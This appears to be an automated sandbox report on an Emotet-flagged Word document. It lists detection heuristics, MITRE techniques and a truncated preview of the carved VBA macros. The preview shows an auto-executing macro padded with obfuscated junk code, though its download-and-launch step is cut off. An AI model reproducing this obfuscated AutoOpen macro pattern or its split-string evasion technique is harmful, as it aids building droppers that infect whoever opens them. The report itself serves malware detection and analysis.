MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros with an autoopen subroutine, a common technique for Emotet. The heuristics indicate the use of WMI to launch processes, and obfuscation of the 'winmgmts' API call. ClamAV also detected this as Emotet. The VBA script likely downloads and executes a second-stage payload.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6939138-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6939138-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32840 bytes |
SHA-256: 63637580c591fbf3983a893cfad6a037ab96140037628a745251c20c8bd55b6a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "uAAGUwX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "RADCD4A_"
Attribute VB_Base = "0{D882166F-D9BA-4DA8-A84C-46E4CD8C9E64}{D78CF6FB-B862-4FE9-BC03-E8E9474AC445}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "iDAACAQ"
Attribute VB_Base = "0{3C725D5C-D8B5-4332-95F7-FEF939F287E4}{2A70ED24-8C1B-4F30-9669-AEE71DDE4106}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "tADZAQ"
Sub autoopen()
If pQ1Gc1 = LUA_B4 Then
Nx4C_A = zcQGG1 - LAoAAA4o
Select Case HGCAc_x
Case 6750152
k1QAUc = CVar(723354492 * Rnd(QQAkZAU * Round(721449592) / 21190537 * CLng(787349579 * Sqr(lco4ADo))))
iGAAwC = Round(j1UAAGDw)
Case 564998708
iQcwUACA = d4BcAAo
PAxoUZkQ = Atn(396033936)
End Select
End If
If qQ4AAD = OG4UAAc Then
SxQCDD = UwoDxA - pAoAQDA
Select Case GDDkA1BA
Case 79816822
qA_UBQ = CVar(247330336 * Rnd(EAAAAQAD * Round(970842398) / 283880087 * CLng(291116281 * Sqr(NAUGCw))))
KA1AG_ = Round(OxADA4)
Case 850775130
KAUQAA = lDXcXA
toAkZwAX = Atn(908675351)
End Select
End If
If rAAoCAQ = UBA_AZc Then
VAUBAAAD = wQAoAQ1A - NoAUcwAB
Select Case oGCUXC
Case 250119717
AB4DDDAw = CVar(669048930 * Rnd(sAZBAQAc * Round(859089900) / 95451493 * CLng(640768456 * Sqr(UAA4AUZ))))
JZAAQA = Round(z4UkwA)
Case 193505518
hxAkoDBA = qXQCUA
zZDxAG = Atn(662985249)
End Select
End If
lGxxAQD4
If uUGAQXo = XAAUZQc Then
QAAAQ_oA = dAXBAA - r1A_AQGA
Select Case jDDADA
Case 430136169
zAwBAA = CVar(546088376 * Rnd(M4xo4oA * Round(58583347) / 540175413 * CLng(826070518 * Sqr(LADABxw))))
ckcZA1AA = Round(SUwX_kAQ)
Case 225601070
F44AQA = jQAAAU
VGBQ4Q = Atn(151232539)
End Select
End If
If vQUXD1B = OkDQBo Then
lA_AA_U = fUAXUA - BAZDco1
Select Case SBXAoUAo
Case 707526549
UoAUA1GA = CVar(555910028 * Rnd(EcwBCAx * Round(754689725) / 530215988 * CLng(159072776 * Sqr(GADwAx))))
zoAAAo = Round(iwoAcQ_X)
Case 577417582
uoC4QZU = ODCUxBB
EGDD1DA = Atn(290834139)
End Select
End If
End Sub
Attribute VB_Name = "jAAG4AU"
Function lGxxAQD4()
On Error Resume Next
If RUAAcGDA = oAXACAD Then
FQ__AAxQ = SCUXABA - EACZ_DU
Select Case GoDAAZ
Case 136352051
wGACAAA1 = CVar(373748631 * Rnd(zAQXxAZA * Round(270932904) / 973182514 * CLng(382208053 * Sqr(wUG1Qw))))
ECZoAk = Round(fXUAAk)
Case 803678515
p4ccAABA = mA4AAB
TxA4xZAG = Atn(793773556)
End Select
End If
If YQAADZw = SDkBUU Then
BQCwQGQ = N_AoAc - aUQUAQU
Select Case UABAGAA
Case 814140208
wAAkZZww = CVar(766661784 * Rnd(wD_Xwx * Round(89245718) / 619440220 * CLng(291268394 * Sqr(BkAkwDB))))
DUAGAB = Round(MQQAUX)
Case 458320918
t_AAXA = QABU1kG
HAkQAAA = Atn(59928413)
End Select
End If
If bUQAco = mACAAU Then
FkQUAXA4 = R1G1BQ - uZUcoD__
Select Case mAx_DAk
Case 969146695
EDBCAUQw = CVar(381963367 * Rnd(UXAAAA * Round(115459939) / 237303284 * CLng(419933571 * Sqr(P1BGwBX))))
tAQGBA = Round(IAADAwAA)
Case 711255456
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.